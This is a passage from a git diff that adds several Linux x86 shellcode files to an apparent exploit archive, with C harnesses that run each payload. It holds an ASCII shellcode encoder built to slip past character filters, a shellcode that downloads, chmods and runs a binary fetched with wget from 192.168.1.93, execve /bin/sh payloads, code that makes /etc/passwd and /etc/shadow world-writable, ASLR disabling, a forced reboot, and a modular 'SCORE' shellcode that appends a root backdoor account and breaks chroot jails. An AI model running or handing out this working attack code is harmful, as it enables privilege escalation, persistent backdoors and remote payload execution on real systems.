+"\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce";
+
+int main(){
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47040.py b/shellcodes/linux_x86/47040.py
new file mode 100755
index 000000000..7f6dd41da
--- /dev/null
+++ b/shellcodes/linux_x86/47040.py
@@ -0,0 +1,280 @@
+#!/usr/bin/env python3
+
+################################################################################
+# INTRODUCTION
+################################################################################
+
+# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD
+# Date: 26.6.2019
+# Encoder Author: Petr Javorik, www.mmquant.net
+# Tested on: Linux ubuntu 3.13.0-32-generic, x86
+# Special thx to: Corelanc0d3r for intro to this technique
+#
+# Description:
+# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
+# Core idea is that every dword can be derived using 3 SUB instructions
+# with operands consisting strictly of ASCII compatible bytes.
+#
+# What it does?:
+# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
+# Then we can do it as follows:
+#
+# AND EAX, 3F465456
+# AND EAX, 40392B29         ; Two AND instructions zero EAX
+# SUB EAX, 3E716230         ; Subtracting 3 dwords consisting
+# SUB EAX, 5D455523         ; of ASCII compatible bytes from 0x00000000
+# SUB EAX, 5E5D7722         ; we get EAX = 0x8BD1EB05
+# PUSH EAX
+
+# Mandatory bytes:
+# \x25  AND EAX, imm32
+# \x2d  SUB EAX, imm32
+# \x50  PUSH EAX
+# \x61  POPAD
+
+# How to use:
+# Edit the SETTINGS section and simply run as
+# ./ASCIIencoder
+
+# ProTip:
+# Take special attention to the memory between the end of decoder instructions
+# and the beginning of decoded shellcode. Program flow must seamlessly step over
+# this memory. If this "bridge memory area" contains illegal opcodes they can
+# be rewritten with additional PUSH instruction appended to the end of generated
+# shellcode. Use for example PUSH 0x41414141.
+
+################################################################################
+
+import itertools
+import struct
+import random
+import sys
+
+assert sys.version_info >= (3, 6)
+
+
+################################################################################
+# CONSTANTS - no changes needed here
+################################################################################
+
+# ASCII character set
+L_CASE = bytearray(range(0x61, 0x7b))   # abcdefghijklmnopqrstuvwxyz
+U_CASE = bytearray(range(0x41, 0x5b))   # ABCDEFGHIJKLMNOPQRSTUVWXYZ
+NUMBERS = bytearray(range(0x30, 0x3a))  # 0123456789
+SPECIAL_CHARS = bytearray(
+    itertools.chain(
+        range(0x21, 0x30),  # !"#$%&\'()*+,-.
+        range(0x3a, 0x41),  # :;<=>?
+        range(0x5b, 0x61),  # [\\]^_
+        range(0x7b, 0x7f)   # {|}
+    )
+)
+ASCII_NOPS = b'\x41\x42\x43\x44'     # and many more
+ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
+
+################################################################################
+# SETTINGS - enter shellcode, select character set and bad chars
+################################################################################
+
+input_shellcode = (
+    b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
+    b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
+    b'\x75\xe7\xff\xe7'
+)
+
+# input_charset = U_CASE + L_CASE
+input_charset = ALL_CHARS
+
+# badchars = b''
+badchars = b''
+
+nops = ASCII_NOPS
+
+################################################################################
+# CORE - no changes needed here
+################################################################################
+
+class ASCII_Encoder(object):
+
+    def __init__(self, shellcode_, charset_, badchars_, nops_):
+
+        # Constructor args
+        self.shellcode = bytearray(shellcode_)
+        self.charset = charset_
+        self.badchars = badchars_
+        self.nops = nops_
+
+        # Private vars
+        self.encoded_dwords = []
+        self.twos_comps = []
+        self.sub_operands = []
+        self.payload = bytearray()
+
+    def encode(self):
+
+        self.align_to_dwords()
+        self.remove_badchars()
+        self.derive_dwords_sub()
+        self.compensate_overflow()
+        self.derived_dwords_to_sub_operands()
+        self.twos_comp_check()
+        self.compile_payload()
+
+
+    def align_to_dwords(self):
+
+        # Input shellcode alignment to dword multiples
+        nop = b'\x90'
+        pad_count = 4 - (len(self.shellcode) % 4)
+        if 0 < pad_count < 4:
+            self.shellcode += nop * pad_count
+
+    def remove_badchars(self):
+
+        for badchar in self.badchars:
+            self.charset = self.charset.replace(bytes([badchar]), b'')
+            self.nops = self.nops.replace(bytes([badchar]), b'')
+
+    def derive_dwords_sub(self):
+
+        def get_sub_encoding_bytes(target):
+            """
+            target      x   y       z
+            0x100 - (0x21+0x21) = 0xbe
+
+            We need to select x, y, z such that it gives target when summed and all of
+            x, y, z is ASCII and non-badchar
+            """
+
+            # Get all possible solutions
+            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
+            results = []
+            for x, y in all_xy:
+                z = target - (x + y)
+                # Get only bytes which are ASCII and non-badchar
+                if (0 < z < 256) and (z in self.charset):
+                    results.append({
+                        'x': x,
+                        'y': y,
+                        'z': z,
+                        'of': True if target >= 0x100 else False
+                    })
+
+            # Choose random solution
+            return random.choice(results)
+
+        for dword in struct.iter_unpack('<L', self.shellcode):
+
+            # 32-bit 2's complement
+            twos_comp = (dword[0] ^ 0xffffffff) + 1
+            self.twos_comps.append(twos_comp)
+
+            encoded_block = []
+            for byte_ in struct.pack('>L', twos_comp):
+
+                # Will overflow be used when calculating this byte using 3 SUB instructions?
+                if byte_ / 3 < min(self.charset):
+                    byte_ += 0x100
+                encoded_block.append(
+                    get_sub_encoding_bytes(byte_))
+                pass
+
+            self.encoded_dwords.append(encoded_block)
+
+    def compensate_overflow(self):
+
+        # If neighbor lower byte overflow then subtract 1 from max(x, y, z)
+        for dword in self.encoded_dwords:
+            for solution, next_solution in zip(dword, dword[1:]):
+                if next_solution['of']:
+                    max_value_key = max(solution, key=solution.get)
+                    solution[max_value_key] -= 1
+
+    def derived_dwords_to_sub_operands(self):
+
+        for dword in self.encoded_dwords:
+
+            sub_operand_0 = struct.pack('<BBBB',
+                                        *[solution['x'] for solution in dword])
+            sub_operand_1 = struct.pack('<BBBB',
+                                        *[solution['y'] for solution in dword])
+            sub_operand_2 = struct.pack('<BBBB',
+                                        *[solution['z'] for solution in dword])
+
+            self.sub_operands.append([
+                sub_operand_0,
+                sub_operand_1,
+                sub_operand_2
+            ])
+
+    def twos_comp_check(self):
+
+        # Check if calculated dwords for SUB instruction give 2's complement if they are summed
+        for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
+            sup_operand_sum = sum(
+                [int.from_bytes(dw, byteorder='big') for dw in sub_operand])
+
+            # Correction of sum if there is overflow on the highest byte
+            if sup_operand_sum > 0xffffffff:
+                sup_operand_sum -= 0x100000000
+            assert (twos_comp == sup_operand_sum)
+
+    def compile_payload(self):
+
+        def derive_bytes_and():
+
+            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
+            results = []
+            for x, y in all_xy:
+                if x + y == 127:
+                    results.append((x, y))
+            while 1:
+                yield random.choice(results)
+
+        def derive_dwords_and():
+
+            gen_bytes = derive_bytes_and()
+            bytes_ = []
+            for _ in range(0, 4):
+                bytes_.append(next(gen_bytes))
+
+            return bytes_
+
+        # POPAD n times to adjust ESP.
+        # Decoded shellcode must be written after the decoder stub
+        self.payload += b'\x61' * (len(self.encoded_dwords))
+
+        for sub_operand in reversed(self.sub_operands):
+
+            # Clearing EAX instructions with AND instructions
+            bytes_ = derive_dwords_and()
+
+            self.payload += b'\x25' + struct.pack('<BBBB',
+                                             *[byte_[0] for byte_ in bytes_])
+            self.payload += b'\x25' + struct.pack('<BBBB',
+                                             *[byte_[1] for byte_ in bytes_])
+
+            # Encoded shellcode with SUB instructions
+            self.payload += b'\x2d' + sub_operand[0][::-1]
+            self.payload += b'\x2d' + sub_operand[1][::-1]
+            self.payload += b'\x2d' + sub_operand[2][::-1]
+
+            # Push EAX
+            self.payload += b'\x50'
+
+        # Pad with NOPs
+        self.payload += bytes(random.choices(self.nops, k=9))
+
+    def print_payload(self):
+
+        print('Original payload length: {}'.format(len(input_shellcode)))
+        print('Encoded payload length: {}'.format(len(self.payload)))
+        print('hex:  ',
+              '\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
+
+
+if __name__ == '__main__':
+
+    encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
+    encoder.encode()
+    encoder.print_payload()
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47043.c b/shellcodes/linux_x86/47043.c
new file mode 100644
index 000000000..8e38935b8
--- /dev/null
+++ b/shellcodes/linux_x86/47043.c
@@ -0,0 +1,113 @@
+/**
+
+; Shellcode 129 Bytes
+; download (via wget) + chmod + execute shellcode + hide output
+;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
+;
+
+global _start
+
+section .text
+
+_start:
+
+    ;fork
+    xor eax,eax
+    mov al,0x2
+    int 0x80
+    xor ebx,ebx
+    cmp eax,ebx
+    jz download
+
+    ; wait(NULL)
+    xor eax,eax
+    mov al,0x7
+    int 0x80
+
+    ; give execution permissions to the binary x
+    xor ecx,ecx
+    xor eax, eax
+    push eax
+    mov al, 0xf
+    push 0x78
+    mov ebx, esp
+    xor ecx, ecx
+    mov cx, 0x1ff
+    int 0x80
+
+    ; execution of binary x
+    xor eax, eax
+    push eax
+    push 0x78
+    mov ebx, esp
+    push eax
+    mov edx, esp
+    push ebx
+    mov ecx, esp
+    mov al, 11
+    int 0x80
+
+download:
+
+    push 0xb
+    pop eax
+    cdq
+    push edx
+    ; download uri
+    mov eax, 0x31263e32 ; 1&>2 hide_output[4]
+    mov eax, 0x6c6c756e ; llun/  hide_output[3]
+    mov eax, 0x2f766564 ; ved  hide_output[2]
+    mov eax, 0x2f3e20 ; />  hide_output[1]
+    mov eax, 0x782f2f ; x//  path[1]
+    mov eax, 0x33392e31 ;93.1 addr[3]
+    mov eax, 0x2e383631 ;.861 addr[2]
+    mov eax, 0x2e323931 ;.291  addr[1]
+    push eax
+    mov ecx,esp
+    push edx
+
+    ; download execution in /usr/bin/wget
+
+    push 0x74 ;t
+    push 0x6567772f ;egw/
+    push 0x6e69622f ;nib/
+    push 0x7273752f ;rsu/
+    mov ebx,esp
+    push edx
+    push ecx
+    push ebx
+    mov ecx,esp
+    int 0x80
+
+**/
+
+// nasm -felf32 wget.nasm -o wget.o
+// ld -m elf_i386 wget.o -o wget
+
+#include <stdio.h>
+#include <string.h>
+
+// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
+
+// SHELLCODE 129 Bytes
+
+char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
+"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
+"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
+"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
+"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
+"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
+"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
+"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
+"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
+"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
+"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
+"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
+"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+void main(int argc, char **argv)
+{
+        int (*func)();
+        func = (int (*)()) buf;
+        (int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47068.c b/shellcodes/linux_x86/47068.c
new file mode 100644
index 000000000..3de6c346d
--- /dev/null
+++ b/shellcodes/linux_x86/47068.c
@@ -0,0 +1,86 @@
+/*
+;Category: Shellcode
+;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21
+bytes)
+;Author: Kirill Nikolaev
+;Date: 01/07/2019
+;Architecture: Linux x86
+
+===========
+Asm Source 
+===========
+
+global _start
+
+section .text
+_start:
+        jmp short call_shellcode
+shellcode:
+        pop ebx
+        xor eax,eax
+        mov al, 11
+        int 0x80
+
+call_shellcode:
+
+        call shellcode
+        message db "/bin/sh"
+================================
+Instruction for nasm compliation
+================================
+
+nasm -f elf32 shellcode.asm -o shellcode.o
+ld -z execstack shellcode.o -o shellcode
+
+===================
+objdump disassembly
+===================
+
+Disassembly of section .text:
+
+
+08048080 <_start>:
+ 8048080:       eb 07                   jmp    8048089 <call_shellcode>
+
+08048082 <shellcode>:
+ 8048082:       5b                      pop    %ebx
+ 8048083:       31 c0                   xor    %eax,%eax
+ 8048085:       b0 0b                   mov    $0xb,%al
+ 8048087:       cd 80                   int    $0x80
+
+08048089 <call_shellcode>:
+ 8048089:       e8 f4 ff ff ff          call   8048082 <shellcode>
+
+0804808e <message>:
+ 804808e:       2f                      das   
+ 804808f:       62 69 6e                bound  %ebp,0x6e(%ecx)
+ 8048092:       2f                      das   
+ 8048093:       73 68                   jae    80480fd <message+0x6f>
+
+==================
+21 Bytes Shellcode
+==================
+
+\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
+
+======================
+C Compilation And Test
+======================
+
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+/*
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47108.txt b/shellcodes/linux_x86/47108.txt
new file mode 100644
index 000000000..e465d6cba
--- /dev/null
+++ b/shellcodes/linux_x86/47108.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
+# Date: 10/07/2019
+# Exploit Author: Xavier Invers Fornells
+# Contact: x4v1s3c@gmail.com	
+# Tested on: Debian 4.19.28
+# Architecture: x86
+# Size: 61 bytes
+
+
+
+#################################### chmod.nasm ####################################
+
+global _start
+section .text
+
+_start:
+	push byte 15		
+	pop eax			
+	push byte 0x64		
+	push word 0x7773	
+	push 0x7361702f		
+	push 0x6374652f		
+	mov ebx, esp
+	
+	push word 0x1b6	
+	pop ecx		
+	
+	int 0x80		
+
+	push byte 15
+	pop eax		
+	push byte 0x77
+	push word 0x6f64
+	push 0x6168732f
+	push 0x6374652f
+	mov ebx, esp
+
+	push word 0x1b6
+	pop ecx
+
+	int 0x80
+
+	push byte 1
+	pop eax
+	int 0x80
+
+#################################### shellcode.c ####################################
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47200.c b/shellcodes/linux_x86/47200.c
new file mode 100644
index 000000000..44d92cf40
--- /dev/null
+++ b/shellcodes/linux_x86/47200.c
@@ -0,0 +1,87 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: chmod(“/etc/shadow”, 0666) and exit for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 53 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+	EXIT_CALL equ 1
+	CHMOD_CALL equ 15
+
+SECTION .text
+
+
+global _start
+
+
+ _start:
+     	nop
+	cdq
+	
+	push byte CHMOD_CALL
+	pop eax
+	
+
+	push edx
+	push byte 0x77
+	push word 0x6f64
+	
+	mov esi, 0x222933f0
+	add esi, 0x3f3f3f3f
+	push esi
+	xor esi, esi
+
+	mov esi, 0x243525f0
+	add esi, 0x3f3f3f3f
+	push esi
+	xor esi, esi
+
+	
+	mov ebx, esp
+	push word 0666Q
+	pop ecx
+	int 0x80
+
+	mov al, EXIT_CALL
+	int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66"
+"\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81"
+"\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe"
+"\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f"
+"\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6"
+"\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+#------------------------- usage --------------------------------------------------# 
+
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \ 
+
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47201.c b/shellcodes/linux_x86/47201.c
new file mode 100644
index 000000000..24dfdc53b
--- /dev/null
+++ b/shellcodes/linux_x86/47201.c
@@ -0,0 +1,102 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: Linux x86 ASLR deactivation for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 107 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+        WRITE_SYSCALL equ 4
+
+        CLOSE_SYSCALL equ 6
+
+SECTION .text
+
+global _start
+
+
+
+_start: 
+        nop
+        mov eax, 0xffffffff
+        not eax
+        push eax
+        mov esi, 0x65636170
+        push esi
+        xor esi, esi
+        mov esi, 0x735f6176
+        push esi
+        xor esi, esi
+        push dword 0x5f657a69
+        push dword 0x6d6f646e
+        push dword 0x61722f6c
+        push dword 0x656e7265
+        push dword 0x6b2f7379
+        push dword 0x732f636f
+        
+        mov esi, 0x72702f2f
+        push esi
+        xor esi, esi
+
+
+        mov ebx,esp 
+        mov cx,0x2bc 
+        mov al,0x6
+        inc al
+        inc al
+        int 0x80
+        mov ebx,eax 
+        push eax 
+        mov dx,0xb01
+        add dx,0x2f2f 
+        push dx 
+        mov ecx,esp 
+        cdq 
+        inc edx
+        mov al,WRITE_SYSCALL 
+        int 0x80
+        mov al,CLOSE_SYSCALL
+        int 0x80 
+ 
+        mov al, 1
+        int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f"
+"\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72"
+"\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3"
+"\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2"
+"\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+
+#------------------------- usage --------------------------------------------------# 
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \ 
+
+
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47202.c b/shellcodes/linux_x86/47202.c
new file mode 100644
index 000000000..7dc5c37e0
--- /dev/null
+++ b/shellcodes/linux_x86/47202.c
@@ -0,0 +1,78 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: [NOT encoded] Linux/x86 Force Reboot shellcode for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 51 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+         SYSCALL_EXECVE equ 11
+
+SECTION .text
+
+global _start
+
+_start:
+        nop
+        or eax, 0xffffffff
+        not eax
+        push eax
+
+
+        mov eax, 0x8b90909d
+        not eax
+        push eax
+
+        mov eax, 0x9a8dd091
+        not eax
+        push eax
+
+        mov eax, 0x969d8cd0
+        not eax
+        push eax
+        
+        xor eax, eax
+        mov ebx, esp
+        push eax
+        push word  0x662d
+        mov  esi, esp
+        push eax
+        push esi
+        push ebx
+        mov  ecx, esp
+        or   al, SYSCALL_EXECVE
+        int  0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50"
+"\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0"
+"\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+
+
+
+#------------------------- usage --------------------------------------------------# 
+
+include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = 
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47240.S b/shellcodes/linux_x86/47240.S
new file mode 100644
index 000000000..44307cd16
--- /dev/null
+++ b/shellcodes/linux_x86/47240.S
@@ -0,0 +1,67 @@
+# tolower() execve() /bin/sh -c (user supplied command)
+# shellcode to evade tolower() and friends, requires %esi
+# to reference a valid writeable address (usually does)
+.text
+	.global _start
+_start:
+        jmp data
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+start:
+	popl    %edi
+        movl    %edi, %ecx     	       
+        xorl    %eax,%eax            
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	pushl   $0x68732f2f            
+	pushl   $0x6e69622f            
+	movl    %esp,%ebx              
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	pushw   $0x632d               
+	movl    %esp,%edi             
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %ecx,%eax
+        movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %edi,%eax
+        movl    %eax,%es:(%esi)
+ 	pushl   %es:(%esi)
+        movl    %ebx,%eax
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %esp,%esi
+	movl    %esi,%ecx
+	xorl    %eax, %eax
+	movb    $0x08, %al           
+	addb    $0x03, %al 
+	int     $0x80                
+data:
+	call start
+    	#command
+.ascii "id"
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47242.asm b/shellcodes/linux_x86/47242.asm
new file mode 100644
index 000000000..53d1ed903
--- /dev/null
+++ b/shellcodes/linux_x86/47242.asm
@@ -0,0 +1,204 @@
+;# Description: SCORE - The ShellCORE
+;#              score is a complete shellcode for x86 processors running
+;#              linux. It is designed to help work further with an exploited
+;#              process.
+;#
+;#    Coded by: prdelka
+
+;#########################
+;#        [CORE]         #
+;#########################
+
+;--- NOP Equivalent instruction
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+
+;--- core initialise
+     jmp $+0x06
+     pop edi
+     push edi
+     jmp edi
+     call $-0x04
+;--- core prompt
+     pop edi
+     push 0x3e0a7964
+     push 0x61655220
+     push 0x65726f43
+     xor eax,eax
+     mov al,0x4
+     xor ebx,ebx
+     mov bl,0x1
+     mov ecx,esp
+     xor edx,edx
+     mov dl,0xc
+     int 0x80
+;--- core read choice
+     xor eax,eax
+     mov ebp,esp
+     push eax
+     mov al,0x3
+     xor ebx,ebx
+     mov bl,0x1
+     mov ecx,ebp
+     xor edx,edx
+     mov dl,0x2
+     int 0x80
+;--- core module selector
+     mov edx,ebp
+
+;### [backdoor module] 'b'
+     cmp word[edx],0x0a62
+     je $+0x5e
+;### [break-chroot-jail module] 'j'
+     cmp word[edx],0x0a6a
+     je $+0x59
+;### [privilege restore module] 'p'
+     cmp word[edx],0x0a70
+     je $+0x37
+;### [shellcode module] 's'
+     cmp word[edx],0x0a73
+     je $+0x14
+;### [exit module] 'x'
+     cmp word[edx],0x0a78
+     je $+0x05
+;--- core loop
+     push edi
+     jmp edi
+
+;#########################
+;#       [MODULES]       #
+;#########################
+
+;--- [exit module]
+     xor eax,eax
+     mov al,0x1
+     xor ebx,ebx
+     int 0x80
+
+;--- [shellcode module]
+     xor eax,eax
+     push eax
+     push 0x68732f2f
+     push 0x6e69622f
+     mov ebx,esp
+     push eax
+     mov edx,esp
+     push ebx
+     mov ecx,esp
+     mov al,0xB
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;--- [privilege restore module]
+     xor eax,eax
+     mov ah,0x17
+     shr eax,0x8
+     xor ebx,ebx
+     int 0x80
+     xor eax,eax
+     mov ah,0x2e
+     shr eax,0x8
+     xor ebx,ebx
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;### [LONG backdoor module jump]
+     jmp $+0x46
+
+;--- [break-chroot-jail]
+     xor eax,eax
+     push eax
+     push 0x6c69616a
+     mov ebx,esp
+     mov edx,esp
+     mov cx,0x2F3
+     mov al,0x27
+     int 0x80
+     xor eax,eax
+     push eax
+     mov ebx,edx
+     mov al,0x3d
+     int 0x80              
+     push 0x2e2e2e2e
+     mov ebx,esp
+     add bl,0x2
+     mov edx,ebx
+     xor ecx,ecx
+     mov cl,0xff
+     mov al,0x0c 
+     mov ebx,edx
+     int 0x80          
+     loop $-0x06             
+     mov ebx,edx
+     add bl,0x1
+     mov al,0x3d
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;--- [backdoor module]
+     xor eax,eax
+     push eax
+     push 0x64777373
+     push 0x61702f2f
+     push 0x6374652f
+     mov esi,esp
+     xor edx,edx
+     xor ecx,ecx
+     mov cl,0x01
+     mov ebx,esi
+     xor eax,eax
+     mov al,0x5
+     int 0x80
+     push eax
+     mov esi,esp
+     xor eax,eax
+     mov al,0x13
+     mov ebx,[esi]
+     xor ecx,ecx
+     xor edx,edx
+     mov dl,0x2
+     int 0x80
+     xor eax,eax
+     mov al,0x4
+     mov ebx,[esi]
+     xor ecx,ecx
+     push ecx
+     push 0x0a687361
+     push 0x622f6e69
+     push 0x622f3a74
+     push 0x6f6f722f
+     push 0x3a676663
+     push 0x20726f66
+     push 0x20726573
+     push 0x75206d65
+     push 0x74737973
+     push 0x3a303a30
+     push 0x3a3a6766
+     push 0x63737973
+     mov ecx,esp
+     xor edx,edx
+     mov dl,0x30
+     int 0x80
+     xor eax,eax
+     mov al,0x6
+     mov ebx,[esi]
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47352.c b/shellcodes/linux_x86/47352.c
new file mode 100644
